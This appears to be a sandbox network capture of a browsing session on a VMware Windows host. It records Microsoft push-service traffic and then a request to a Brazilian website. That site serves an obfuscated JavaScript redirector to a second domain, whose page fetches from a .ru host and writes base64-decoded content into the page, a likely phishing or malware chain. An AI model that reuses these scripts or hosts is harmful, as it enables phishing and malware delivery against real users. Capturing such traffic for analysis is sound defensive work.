2024-07-03 07:40:16 UTC	1064	OUT	Data Raw: 41 54 48 20 32 20 43 4f 4e 5c 44 45 56 49 43 45 20 31 30 34 31 0d 0a 4d 53 2d 43 56 3a 20 63 75 61 63 5a 4d 68 49 6c 6b 65 47 78 63 50 75 2e 32 0d 0a 43 6f 6e 74 65 78 74 3a 20 65 63 31 61 34 66 39 63 33 63 33 32 33 37 65 39 0d 0a 0d 0a 3c 64 65 76 69 63 65 3e 3c 63 6f 6d 70 61 63 74 2d 74 69 63 6b 65 74 3e 74 3d 45 77 43 6f 41 75 70 49 42 41 41 55 31 62 44 47 66 64 61 7a 69 44 66 58 70 6a 4e 35 4e 36 63 59 68 54 31 77 62 6d 51 41 41 62 4a 4d 76 4b 6e 47 2b 5a 70 34 4c 4a 68 46 44 56 76 62 51 4f 48 4f 69 49 4a 65 2b 75 54 4e 65 73 61 45 57 63 67 75 44 5a 51 4c 59 45 6e 41 32 46 79 38 66 77 45 46 76 62 2f 4d 51 31 71 63 6a 6a 64 57 6f 67 34 2b 73 30 63 35 69 2b 6c 49 6d 72 37 6e 46 30 48 33 58 63 62 44 4b 52 74 7a 6b 67 50 46 64 63 67 57 55 54 4a 36 57 33 Data Ascii: ATH 2 CON\DEVICE 1041MS-CV: cuacZMhIlkeGxcPu.2Context: ec1a4f9c3c3237e9<device><compact-ticket>t=EwCoAupIBAAU1bDGfdaziDfXpjN5N6cYhT1wbmQAAbJMvKnG+Zp4LJhFDVvbQOHOiIJe+uTNesaEWcguDZQLYEnA2Fy8fwEFvb/MQ1qcjjdWog4+s0c5i+lImr7nF0H3XcbDKRtzkgPFdcgWUTJ6W3
2024-07-03 07:40:16 UTC	74	OUT	Data Raw: 42 4e 44 20 33 20 43 4f 4e 5c 51 4f 53 20 35 36 0d 0a 4d 53 2d 43 56 3a 20 63 75 61 63 5a 4d 68 49 6c 6b 65 47 78 63 50 75 2e 33 0d 0a 43 6f 6e 74 65 78 74 3a 20 65 63 31 61 34 66 39 63 33 63 33 32 33 37 65 39 0d 0a 0d 0a Data Ascii: BND 3 CON\QOS 56MS-CV: cuacZMhIlkeGxcPu.3Context: ec1a4f9c3c3237e9
2024-07-03 07:40:16 UTC	14	IN	Data Raw: 32 30 32 20 31 20 43 4f 4e 20 35 38 0d 0a Data Ascii: 202 1 CON 58
2024-07-03 07:40:16 UTC	58	IN	Data Raw: 4d 53 2d 43 56 3a 20 33 67 35 5a 32 69 2f 51 4d 30 69 6a 65 78 30 68 57 63 76 2b 6e 67 2e 30 0d 0a 0d 0a 50 61 79 6c 6f 61 64 20 70 61 72 73 69 6e 67 20 66 61 69 6c 65 64 2e Data Ascii: MS-CV: 3g5Z2i/QM0ijex0hWcv+ng.0Payload parsing failed.

Timestamp	Bytes transferred	Direction	Data
2024-07-03 07:40:21 UTC	71	OUT	Data Raw: 43 4e 54 20 31 20 43 4f 4e 20 33 30 35 0d 0a 4d 53 2d 43 56 3a 20 37 77 78 78 42 6e 75 57 4e 45 65 5a 57 62 54 35 2e 31 0d 0a 43 6f 6e 74 65 78 74 3a 20 34 65 63 66 64 32 35 66 39 62 36 37 66 38 36 64 0d 0a 0d 0a Data Ascii: CNT 1 CON 305MS-CV: 7wxxBnuWNEeZWbT5.1Context: 4ecfd25f9b67f86d
2024-07-03 07:40:21 UTC	249	OUT	Data Raw: 3c 63 6f 6e 6e 65 63 74 3e 3c 76 65 72 3e 32 3c 2f 76 65 72 3e 3c 61 67 65 6e 74 3e 3c 6f 73 3e 57 69 6e 64 6f 77 73 3c 2f 6f 73 3e 3c 6f 73 56 65 72 3e 31 30 2e 30 2e 30 2e 30 2e 31 39 30 34 35 3c 2f 6f 73 56 65 72 3e 3c 70 72 6f 63 3e 78 36 34 3c 2f 70 72 6f 63 3e 3c 6c 63 69 64 3e 65 6e 2d 43 48 3c 2f 6c 63 69 64 3e 3c 67 65 6f 49 64 3e 32 32 33 3c 2f 67 65 6f 49 64 3e 3c 61 6f 61 63 3e 30 3c 2f 61 6f 61 63 3e 3c 64 65 76 69 63 65 54 79 70 65 3e 31 3c 2f 64 65 76 69 63 65 54 79 70 65 3e 3c 64 65 76 69 63 65 4e 61 6d 65 3e 56 4d 77 61 72 65 32 30 2c 31 3c 2f 64 65 76 69 63 65 4e 61 6d 65 3e 3c 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 74 72 75 65 3c 2f 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 3c 2f 61 67 65 6e 74 3e 3c 2f 63 6f 6e 6e 65 63 74 3e Data Ascii: <connect><ver>2</ver><agent><os>Windows</os><osVer>10.0.0.0.19045</osVer><proc>x64</proc><lcid>en-CH</lcid><geoId>223</geoId><aoac>0</aoac><deviceType>1</deviceType><deviceName>VMware20,1</deviceName><followRetry>true</followRetry></agent></connect>
2024-07-03 07:40:21 UTC	1064	OUT	Data Raw: 41 54 48 20 32 20 43 4f 4e 5c 44 45 56 49 43 45 20 31 30 34 31 0d 0a 4d 53 2d 43 56 3a 20 37 77 78 78 42 6e 75 57 4e 45 65 5a 57 62 54 35 2e 32 0d 0a 43 6f 6e 74 65 78 74 3a 20 34 65 63 66 64 32 35 66 39 62 36 37 66 38 36 64 0d 0a 0d 0a 3c 64 65 76 69 63 65 3e 3c 63 6f 6d 70 61 63 74 2d 74 69 63 6b 65 74 3e 74 3d 45 77 43 6f 41 75 70 49 42 41 41 55 31 62 44 47 66 64 61 7a 69 44 66 58 70 6a 4e 35 4e 36 63 59 68 54 31 77 62 6d 51 41 41 62 4a 4d 76 4b 6e 47 2b 5a 70 34 4c 4a 68 46 44 56 76 62 51 4f 48 4f 69 49 4a 65 2b 75 54 4e 65 73 61 45 57 63 67 75 44 5a 51 4c 59 45 6e 41 32 46 79 38 66 77 45 46 76 62 2f 4d 51 31 71 63 6a 6a 64 57 6f 67 34 2b 73 30 63 35 69 2b 6c 49 6d 72 37 6e 46 30 48 33 58 63 62 44 4b 52 74 7a 6b 67 50 46 64 63 67 57 55 54 4a 36 57 33 Data Ascii: ATH 2 CON\DEVICE 1041MS-CV: 7wxxBnuWNEeZWbT5.2Context: 4ecfd25f9b67f86d<device><compact-ticket>t=EwCoAupIBAAU1bDGfdaziDfXpjN5N6cYhT1wbmQAAbJMvKnG+Zp4LJhFDVvbQOHOiIJe+uTNesaEWcguDZQLYEnA2Fy8fwEFvb/MQ1qcjjdWog4+s0c5i+lImr7nF0H3XcbDKRtzkgPFdcgWUTJ6W3
2024-07-03 07:40:21 UTC	74	OUT	Data Raw: 42 4e 44 20 33 20 43 4f 4e 5c 51 4f 53 20 35 36 0d 0a 4d 53 2d 43 56 3a 20 37 77 78 78 42 6e 75 57 4e 45 65 5a 57 62 54 35 2e 33 0d 0a 43 6f 6e 74 65 78 74 3a 20 34 65 63 66 64 32 35 66 39 62 36 37 66 38 36 64 0d 0a 0d 0a Data Ascii: BND 3 CON\QOS 56MS-CV: 7wxxBnuWNEeZWbT5.3Context: 4ecfd25f9b67f86d
2024-07-03 07:40:21 UTC	14	IN	Data Raw: 32 30 32 20 31 20 43 4f 4e 20 35 38 0d 0a Data Ascii: 202 1 CON 58
2024-07-03 07:40:21 UTC	58	IN	Data Raw: 4d 53 2d 43 56 3a 20 39 71 79 72 71 72 4c 68 32 55 79 39 38 2b 63 2b 31 46 2b 57 47 67 2e 30 0d 0a 0d 0a 50 61 79 6c 6f 61 64 20 70 61 72 73 69 6e 67 20 66 61 69 6c 65 64 2e Data Ascii: MS-CV: 9qyrqrLh2Uy98+c+1F+WGg.0Payload parsing failed.

Timestamp	Bytes transferred	Direction	Data
2024-07-03 07:40:26 UTC	71	OUT	Data Raw: 43 4e 54 20 31 20 43 4f 4e 20 33 30 35 0d 0a 4d 53 2d 43 56 3a 20 71 4c 64 58 34 35 57 4e 79 30 6d 7a 50 71 77 53 2e 31 0d 0a 43 6f 6e 74 65 78 74 3a 20 64 65 39 39 39 65 39 61 39 32 36 37 63 38 66 66 0d 0a 0d 0a Data Ascii: CNT 1 CON 305MS-CV: qLdX45WNy0mzPqwS.1Context: de999e9a9267c8ff
2024-07-03 07:40:26 UTC	249	OUT	Data Raw: 3c 63 6f 6e 6e 65 63 74 3e 3c 76 65 72 3e 32 3c 2f 76 65 72 3e 3c 61 67 65 6e 74 3e 3c 6f 73 3e 57 69 6e 64 6f 77 73 3c 2f 6f 73 3e 3c 6f 73 56 65 72 3e 31 30 2e 30 2e 30 2e 30 2e 31 39 30 34 35 3c 2f 6f 73 56 65 72 3e 3c 70 72 6f 63 3e 78 36 34 3c 2f 70 72 6f 63 3e 3c 6c 63 69 64 3e 65 6e 2d 43 48 3c 2f 6c 63 69 64 3e 3c 67 65 6f 49 64 3e 32 32 33 3c 2f 67 65 6f 49 64 3e 3c 61 6f 61 63 3e 30 3c 2f 61 6f 61 63 3e 3c 64 65 76 69 63 65 54 79 70 65 3e 31 3c 2f 64 65 76 69 63 65 54 79 70 65 3e 3c 64 65 76 69 63 65 4e 61 6d 65 3e 56 4d 77 61 72 65 32 30 2c 31 3c 2f 64 65 76 69 63 65 4e 61 6d 65 3e 3c 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 74 72 75 65 3c 2f 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 3c 2f 61 67 65 6e 74 3e 3c 2f 63 6f 6e 6e 65 63 74 3e Data Ascii: <connect><ver>2</ver><agent><os>Windows</os><osVer>10.0.0.0.19045</osVer><proc>x64</proc><lcid>en-CH</lcid><geoId>223</geoId><aoac>0</aoac><deviceType>1</deviceType><deviceName>VMware20,1</deviceName><followRetry>true</followRetry></agent></connect>
2024-07-03 07:40:26 UTC	1076	OUT	Data Raw: 41 54 48 20 32 20 43 4f 4e 5c 44 45 56 49 43 45 20 31 30 35 33 0d 0a 4d 53 2d 43 56 3a 20 71 4c 64 58 34 35 57 4e 79 30 6d 7a 50 71 77 53 2e 32 0d 0a 43 6f 6e 74 65 78 74 3a 20 64 65 39 39 39 65 39 61 39 32 36 37 63 38 66 66 0d 0a 0d 0a 3c 64 65 76 69 63 65 3e 3c 63 6f 6d 70 61 63 74 2d 74 69 63 6b 65 74 3e 74 3d 45 77 43 77 41 75 70 49 42 41 41 55 31 62 44 47 66 64 61 7a 69 44 66 58 70 6a 4e 35 4e 36 63 59 68 54 31 77 62 6d 51 41 41 58 7a 55 45 6b 33 4e 66 59 68 39 44 37 4a 45 5a 56 62 6c 51 70 7a 62 55 68 49 35 31 6e 4c 71 31 6c 79 78 73 49 65 70 6c 50 58 6f 72 4f 79 52 49 56 48 6e 75 53 2b 51 69 6e 32 63 6a 51 38 47 78 6c 52 66 65 2f 66 72 53 38 6e 4e 35 33 45 6b 50 56 49 67 5a 54 76 4c 63 7a 43 74 4b 2f 74 4b 78 6b 4e 6c 45 66 39 33 48 61 4b 43 39 4b Data Ascii: ATH 2 CON\DEVICE 1053MS-CV: qLdX45WNy0mzPqwS.2Context: de999e9a9267c8ff<device><compact-ticket>t=EwCwAupIBAAU1bDGfdaziDfXpjN5N6cYhT1wbmQAAXzUEk3NfYh9D7JEZVblQpzbUhI51nLq1lyxsIeplPXorOyRIVHnuS+Qin2cjQ8GxlRfe/frS8nN53EkPVIgZTvLczCtK/tKxkNlEf93HaKC9K
2024-07-03 07:40:26 UTC	218	OUT	Data Raw: 42 4e 44 20 33 20 43 4f 4e 5c 57 4e 53 20 30 20 31 39 37 0d 0a 4d 53 2d 43 56 3a 20 71 4c 64 58 34 35 57 4e 79 30 6d 7a 50 71 77 53 2e 33 0d 0a 43 6f 6e 74 65 78 74 3a 20 64 65 39 39 39 65 39 61 39 32 36 37 63 38 66 66 0d 0a 0d 0a 3c 77 6e 73 3e 3c 76 65 72 3e 31 3c 2f 76 65 72 3e 3c 63 6c 69 65 6e 74 3e 3c 6e 61 6d 65 3e 57 50 4e 3c 2f 6e 61 6d 65 3e 3c 76 65 72 3e 31 2e 30 3c 2f 76 65 72 3e 3c 2f 63 6c 69 65 6e 74 3e 3c 6f 70 74 69 6f 6e 73 3e 3c 70 77 72 6d 6f 64 65 20 6d 6f 64 65 3d 22 30 22 3e 3c 2f 70 77 72 6d 6f 64 65 3e 3c 2f 6f 70 74 69 6f 6e 73 3e 3c 6c 61 73 74 4d 73 67 49 64 3e 30 3c 2f 6c 61 73 74 4d 73 67 49 64 3e 3c 2f 77 6e 73 3e Data Ascii: BND 3 CON\WNS 0 197MS-CV: qLdX45WNy0mzPqwS.3Context: de999e9a9267c8ff<wns><ver>1</ver><client><name>WPN</name><ver>1.0</ver></client><options><pwrmode mode="0"></pwrmode></options><lastMsgId>0</lastMsgId></wns>
2024-07-03 07:40:26 UTC	14	IN	Data Raw: 32 30 32 20 31 20 43 4f 4e 20 35 38 0d 0a Data Ascii: 202 1 CON 58
2024-07-03 07:40:26 UTC	58	IN	Data Raw: 4d 53 2d 43 56 3a 20 5a 56 76 31 35 4d 51 34 31 6b 53 31 74 45 59 48 52 61 45 49 30 41 2e 30 0d 0a 0d 0a 50 61 79 6c 6f 61 64 20 70 61 72 73 69 6e 67 20 66 61 69 6c 65 64 2e Data Ascii: MS-CV: ZVv15MQ41kS1tEYHRaEI0A.0Payload parsing failed.

Timestamp	Bytes transferred	Direction	Data
2024-07-03 07:40:30 UTC	922	OUT	GET /www/1475312998d8aKqdmPdPNJZi4JNq7WIowwvYGOvuIT___714820ufgtMx5cBwKyVuzlJn3VAYy1QdJUF0IuhCb1EFSueBwxxR9n7T4VNMSyrZd9kcF9rD67v2lJn3VufgtMP8xfiVl9n3IuhCbR9n7Tx5cBw4VNMSx5cBwi3vtsVl9n3MryfS1EFSuufgtMi3vts7O1AR408519___47741237d8aKqdmPdPNJZi4JNq7WIowwvYGOvuIT HTTP/1.1 Host: www.itanhangasaude.com.br Connection: keep-alive sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 sec-ch-ua-platform: "Windows" Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Sec-Fetch-Site: none Sec-Fetch-Mode: navigate Sec-Fetch-User: ?1 Sec-Fetch-Dest: document Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-07-03 07:40:30 UTC	212	IN	HTTP/1.1 200 OK Date: Wed, 03 Jul 2024 07:40:30 GMT Server: nginx/1.23.4 Content-Type: text/html; charset=UTF-8 Vary: Accept-Encoding X-Server-Cache: true X-Proxy-Cache: MISS Transfer-Encoding: chunked
2024-07-03 07:40:30 UTC	5273	IN	Data Raw: 31 34 38 63 0d 0a 3c 73 63 72 69 70 74 3e 0a 20 20 20 20 76 61 72 20 6c 61 6e 64 20 3d 20 22 68 74 74 70 73 3a 2f 2f 76 6b 77 65 6b 2e 63 6b 79 75 63 6c 65 2e 63 6f 6d 2f 32 44 55 78 2f 23 2d 22 3b 0a 20 20 20 20 76 61 72 20 5f 77 68 65 72 65 20 3d 20 32 3b 0a 20 20 20 20 76 61 72 20 5f 77 68 69 63 68 20 3d 20 22 5f 5f 5f 22 3b 0a 20 20 20 20 0a 20 20 20 20 76 61 72 20 5f 30 78 32 38 35 36 38 37 3d 5f 30 78 32 38 38 62 3b 28 66 75 6e 63 74 69 6f 6e 28 5f 30 78 35 39 61 39 64 63 2c 5f 30 78 35 35 34 64 31 64 29 7b 76 61 72 20 5f 30 78 32 37 30 39 39 31 3d 5f 30 78 32 38 38 62 2c 5f 30 78 33 31 38 39 39 31 3d 5f 30 78 35 39 61 39 64 63 28 29 3b 77 68 69 6c 65 28 21 21 5b 5d 29 7b 74 72 79 7b 76 61 72 20 5f 30 78 31 36 30 61 64 38 3d 70 61 72 73 65 49 6e 74 Data Ascii: 148c<script> var land = "https://vkwek.ckyucle.com/2DUx/#-"; var _where = 2; var _which = "___"; var _0x285687=_0x288b;(function(_0x59a9dc,_0x554d1d){var _0x270991=_0x288b,_0x318991=_0x59a9dc();while(!![]){try{var _0x160ad8=parseInt

Timestamp	Bytes transferred	Direction	Data
2024-07-03 07:40:31 UTC	71	OUT	Data Raw: 43 4e 54 20 31 20 43 4f 4e 20 33 30 35 0d 0a 4d 53 2d 43 56 3a 20 57 51 78 34 64 6b 45 59 44 45 53 4b 67 2b 41 73 2e 31 0d 0a 43 6f 6e 74 65 78 74 3a 20 61 36 65 32 61 37 65 38 36 38 38 61 38 61 61 65 0d 0a 0d 0a Data Ascii: CNT 1 CON 305MS-CV: WQx4dkEYDESKg+As.1Context: a6e2a7e8688a8aae
2024-07-03 07:40:31 UTC	249	OUT	Data Raw: 3c 63 6f 6e 6e 65 63 74 3e 3c 76 65 72 3e 32 3c 2f 76 65 72 3e 3c 61 67 65 6e 74 3e 3c 6f 73 3e 57 69 6e 64 6f 77 73 3c 2f 6f 73 3e 3c 6f 73 56 65 72 3e 31 30 2e 30 2e 30 2e 30 2e 31 39 30 34 35 3c 2f 6f 73 56 65 72 3e 3c 70 72 6f 63 3e 78 36 34 3c 2f 70 72 6f 63 3e 3c 6c 63 69 64 3e 65 6e 2d 43 48 3c 2f 6c 63 69 64 3e 3c 67 65 6f 49 64 3e 32 32 33 3c 2f 67 65 6f 49 64 3e 3c 61 6f 61 63 3e 30 3c 2f 61 6f 61 63 3e 3c 64 65 76 69 63 65 54 79 70 65 3e 31 3c 2f 64 65 76 69 63 65 54 79 70 65 3e 3c 64 65 76 69 63 65 4e 61 6d 65 3e 56 4d 77 61 72 65 32 30 2c 31 3c 2f 64 65 76 69 63 65 4e 61 6d 65 3e 3c 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 74 72 75 65 3c 2f 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 3c 2f 61 67 65 6e 74 3e 3c 2f 63 6f 6e 6e 65 63 74 3e Data Ascii: <connect><ver>2</ver><agent><os>Windows</os><osVer>10.0.0.0.19045</osVer><proc>x64</proc><lcid>en-CH</lcid><geoId>223</geoId><aoac>0</aoac><deviceType>1</deviceType><deviceName>VMware20,1</deviceName><followRetry>true</followRetry></agent></connect>
2024-07-03 07:40:31 UTC	1064	OUT	Data Raw: 41 54 48 20 32 20 43 4f 4e 5c 44 45 56 49 43 45 20 31 30 34 31 0d 0a 4d 53 2d 43 56 3a 20 57 51 78 34 64 6b 45 59 44 45 53 4b 67 2b 41 73 2e 32 0d 0a 43 6f 6e 74 65 78 74 3a 20 61 36 65 32 61 37 65 38 36 38 38 61 38 61 61 65 0d 0a 0d 0a 3c 64 65 76 69 63 65 3e 3c 63 6f 6d 70 61 63 74 2d 74 69 63 6b 65 74 3e 74 3d 45 77 43 6f 41 75 70 49 42 41 41 55 31 62 44 47 66 64 61 7a 69 44 66 58 70 6a 4e 35 4e 36 63 59 68 54 31 77 62 6d 51 41 41 62 4a 4d 76 4b 6e 47 2b 5a 70 34 4c 4a 68 46 44 56 76 62 51 4f 48 4f 69 49 4a 65 2b 75 54 4e 65 73 61 45 57 63 67 75 44 5a 51 4c 59 45 6e 41 32 46 79 38 66 77 45 46 76 62 2f 4d 51 31 71 63 6a 6a 64 57 6f 67 34 2b 73 30 63 35 69 2b 6c 49 6d 72 37 6e 46 30 48 33 58 63 62 44 4b 52 74 7a 6b 67 50 46 64 63 67 57 55 54 4a 36 57 33 Data Ascii: ATH 2 CON\DEVICE 1041MS-CV: WQx4dkEYDESKg+As.2Context: a6e2a7e8688a8aae<device><compact-ticket>t=EwCoAupIBAAU1bDGfdaziDfXpjN5N6cYhT1wbmQAAbJMvKnG+Zp4LJhFDVvbQOHOiIJe+uTNesaEWcguDZQLYEnA2Fy8fwEFvb/MQ1qcjjdWog4+s0c5i+lImr7nF0H3XcbDKRtzkgPFdcgWUTJ6W3
2024-07-03 07:40:31 UTC	74	OUT	Data Raw: 42 4e 44 20 33 20 43 4f 4e 5c 51 4f 53 20 35 36 0d 0a 4d 53 2d 43 56 3a 20 57 51 78 34 64 6b 45 59 44 45 53 4b 67 2b 41 73 2e 33 0d 0a 43 6f 6e 74 65 78 74 3a 20 61 36 65 32 61 37 65 38 36 38 38 61 38 61 61 65 0d 0a 0d 0a Data Ascii: BND 3 CON\QOS 56MS-CV: WQx4dkEYDESKg+As.3Context: a6e2a7e8688a8aae
2024-07-03 07:40:31 UTC	14	IN	Data Raw: 32 30 32 20 31 20 43 4f 4e 20 35 38 0d 0a Data Ascii: 202 1 CON 58
2024-07-03 07:40:31 UTC	58	IN	Data Raw: 4d 53 2d 43 56 3a 20 5a 68 49 59 54 34 32 67 79 55 43 77 67 48 67 6f 42 68 39 52 37 77 2e 30 0d 0a 0d 0a 50 61 79 6c 6f 61 64 20 70 61 72 73 69 6e 67 20 66 61 69 6c 65 64 2e Data Ascii: MS-CV: ZhIYT42gyUCwgHgoBh9R7w.0Payload parsing failed.

Timestamp	Bytes transferred	Direction	Data
2024-07-03 07:40:31 UTC	696	OUT	GET /2DUx/ HTTP/1.1 Host: vkwek.ckyucle.com Connection: keep-alive sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 sec-ch-ua-platform: "Windows" Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Sec-Fetch-Site: cross-site Sec-Fetch-Mode: navigate Sec-Fetch-Dest: document Referer: https://www.itanhangasaude.com.br/ Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-07-03 07:40:32 UTC	1005	IN	HTTP/1.1 200 OK Date: Wed, 03 Jul 2024 07:40:32 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Cache-Control: no-cache, private CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=9ENsTxDwu2HROkgrnNekb%2FgywkB5tLr9R5fJXYYmiPMGGQxt26qfVwXWDBAJsWoGmzwcRhAHI38yzTXyvgjw%2F5bH2twjBC4lZNzI0EYohK4mgu1qZ%2FjTkkonqDJaqg%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} alt-svc: h3=":443"; ma=86400 Set-Cookie: XSRF-TOKEN=eyJpdiI6Ii9RdnVXMlk4Q0pJOFlzbnA2bDRxWXc9PSIsInZhbHVlIjoia0llVG1KMVREc0xvbDVLeVR1Y2wrYTdaNjFmRlY4d2RBSFRacldCbHg4M0x2RWVaTncyMEtlV1JDYnlxejdjbTZUZzBRMmhTWHRpYzhxQlRkK2JkZzJxS1dLMWFRVUg5TEhPa1RBczRwaC9QbU94UFZCN3huU3ordDN3cHFpdWQiLCJtYWMiOiI3MTEwZTM5YzMwMTJmODU5ZWVlYWE3OTJjYWM2ZDkyODU1ZTEwMmJiNjZiNGQxODE4ZTM0YzE4YzczMWM0OGRiIiwidGFnIjoiIn0%3D; expires=Wed, 03-Jul-2024 09:40:31 GMT; Max-Age=7200; path=/; secure; samesite=none
2024-07-03 07:40:32 UTC	518	IN	Data Raw: 53 65 74 2d 43 6f 6f 6b 69 65 3a 20 6c 61 72 61 76 65 6c 5f 73 65 73 73 69 6f 6e 3d 65 79 4a 70 64 69 49 36 49 6a 5a 76 4f 45 70 47 53 46 64 43 51 6e 49 72 4d 7a 6b 72 65 6e 52 4e 63 31 64 51 4e 33 63 39 50 53 49 73 49 6e 5a 68 62 48 56 6c 49 6a 6f 69 54 6b 56 46 5a 54 4e 53 65 55 52 35 63 30 49 77 61 57 78 56 4e 30 46 54 4f 47 6c 4f 52 47 74 58 55 79 39 6e 56 57 52 30 4e 47 68 4c 52 46 70 52 59 6e 46 6f 54 55 4a 6c 53 6a 68 6d 54 47 64 74 52 30 73 72 55 6e 56 53 54 54 64 4b 52 33 6c 32 51 6a 6c 78 59 30 51 30 4e 33 6c 48 4d 56 70 61 5a 46 51 30 64 31 6c 36 5a 46 6b 78 4b 30 31 6d 4e 30 74 4a 4d 6e 45 30 65 56 6c 35 56 30 64 61 65 6b 56 69 57 55 5a 4f 57 6a 4a 6d 51 30 70 35 59 6d 5a 47 55 6d 77 78 54 58 41 77 57 44 52 74 55 55 5a 56 55 6e 56 77 57 47 77 Data Ascii: Set-Cookie: laravel_session=eyJpdiI6IjZvOEpGSFdCQnIrMzkrenRNc1dQN3c9PSIsInZhbHVlIjoiTkVFZTNSeUR5c0IwaWxVN0FTOGlORGtXUy9nVWR0NGhLRFpRYnFoTUJlSjhmTGdtR0srUnVSTTdKR3l2QjlxY0Q0N3lHMVpaZFQ0d1l6ZFkxK01mN0tJMnE0eVl5V0daekViWUZOWjJmQ0p5YmZGUmwxTXAwWDRtUUZVUnVwWGw
2024-07-03 07:40:32 UTC	1369	IN	Data Raw: 31 37 36 64 0d 0a 3c 73 63 72 69 70 74 3e 66 65 74 63 68 28 27 68 74 74 70 73 3a 2f 2f 4e 7a 44 39 32 2e 36 67 6e 69 75 36 38 2e 72 75 2f 35 35 37 35 39 36 38 32 30 32 34 36 31 34 38 35 33 38 38 38 36 35 35 36 35 44 75 47 7a 63 72 54 79 4f 5a 4c 46 4e 4c 44 49 59 53 56 58 5a 44 50 4f 4c 4c 44 53 45 44 4e 51 4d 53 46 27 2c 20 7b 0d 0a 6d 65 74 68 6f 64 3a 20 22 47 45 54 22 2c 0d 0a 7d 29 2e 74 68 65 6e 28 72 65 73 70 6f 6e 73 65 20 3d 3e 20 7b 0d 0a 72 65 74 75 72 6e 20 72 65 73 70 6f 6e 73 65 2e 74 65 78 74 28 29 0d 0a 7d 29 2e 74 68 65 6e 28 74 65 78 74 20 3d 3e 20 7b 0d 0a 69 66 28 74 65 78 74 20 3d 3d 20 30 29 7b 20 0d 0a 64 6f 63 75 6d 65 6e 74 2e 77 72 69 74 65 28 64 65 63 6f 64 65 55 52 49 43 6f 6d 70 6f 6e 65 6e 74 28 65 73 63 61 70 65 28 61 74 6f Data Ascii: 176d<script>fetch('https://NzD92.6gniu68.ru/5575968202461485388865565DuGzcrTyOZLFNLDIYSVXZDPOLLDSEDNQMSF', {method: "GET",}).then(response => {return response.text()}).then(text => {if(text == 0){ document.write(decodeURIComponent(escape(ato
2024-07-03 07:40:32 UTC	1369	IN	Data Raw: 4e 43 6e 30 4e 43 69 4e 6b 57 47 46 74 62 47 74 70 52 58 68 7a 49 48 42 37 62 57 46 79 5a 32 6c 75 4c 58 52 76 63 44 6f 77 4f 32 31 68 63 6d 64 70 62 69 31 69 62 33 52 30 62 32 30 36 4d 58 4a 6c 62 54 74 39 44 51 6f 6a 5a 46 68 68 62 57 78 72 61 55 56 34 63 79 35 6a 62 32 35 30 59 57 6c 75 5a 58 4a 37 64 32 6c 6b 64 47 67 36 49 44 45 77 4d 43 55 37 63 47 46 6b 5a 47 6c 75 5a 79 31 79 61 57 64 6f 64 44 6f 67 64 6d 46 79 4b 43 30 74 59 6e 4d 74 5a 33 56 30 64 47 56 79 4c 58 67 73 49 43 34 33 4e 58 4a 6c 62 53 6b 37 63 47 46 6b 5a 47 6c 75 5a 79 31 73 5a 57 5a 30 4f 69 42 32 59 58 49 6f 4c 53 31 69 63 79 31 6e 64 58 52 30 5a 58 49 74 65 43 77 67 4c 6a 63 31 63 6d 56 74 4b 54 74 74 59 58 4a 6e 61 57 34 74 63 6d 6c 6e 61 48 51 36 49 47 46 31 64 47 38 37 62 57 Data Ascii: NCn0NCiNkWGFtbGtpRXhzIHB7bWFyZ2luLXRvcDowO21hcmdpbi1ib3R0b206MXJlbTt9DQojZFhhbWxraUV4cy5jb250YWluZXJ7d2lkdGg6IDEwMCU7cGFkZGluZy1yaWdodDogdmFyKC0tYnMtZ3V0dGVyLXgsIC43NXJlbSk7cGFkZGluZy1sZWZ0OiB2YXIoLS1icy1ndXR0ZXIteCwgLjc1cmVtKTttYXJnaW4tcmlnaHQ6IGF1dG87bW
2024-07-03 07:40:32 UTC	1369	IN	Data Raw: 4c 57 5a 68 62 57 6c 73 65 54 6f 67 59 58 4a 70 59 57 77 73 49 48 4e 68 62 6e 4d 74 63 32 56 79 61 57 59 37 59 6d 46 6a 61 32 64 79 62 33 56 75 5a 43 31 6a 62 32 78 76 63 6a 6f 67 49 32 5a 6d 5a 6a 74 6a 62 32 78 76 63 6a 6f 67 49 7a 41 77 4d 44 74 77 59 57 52 6b 61 57 35 6e 4f 69 41 79 4d 48 42 34 4f 32 5a 76 62 6e 51 74 63 32 6c 36 5a 54 6f 67 4d 54 68 77 65 44 74 76 64 6d 56 79 63 32 4e 79 62 32 78 73 4c 57 4a 6c 61 47 46 32 61 57 39 79 4f 69 42 6a 62 32 35 30 59 57 6c 75 4f 79 49 2b 44 51 6f 38 49 53 30 74 49 44 78 6b 61 58 59 2b 55 33 56 6a 59 32 56 7a 63 79 42 70 63 79 42 30 61 47 55 67 63 33 56 74 49 47 39 6d 49 48 4e 74 59 57 78 73 49 47 56 6d 5a 6d 39 79 64 48 4d 73 49 48 4a 6c 63 47 56 68 64 47 56 6b 49 47 52 68 65 53 42 70 62 69 42 68 62 6d 51 Data Ascii: 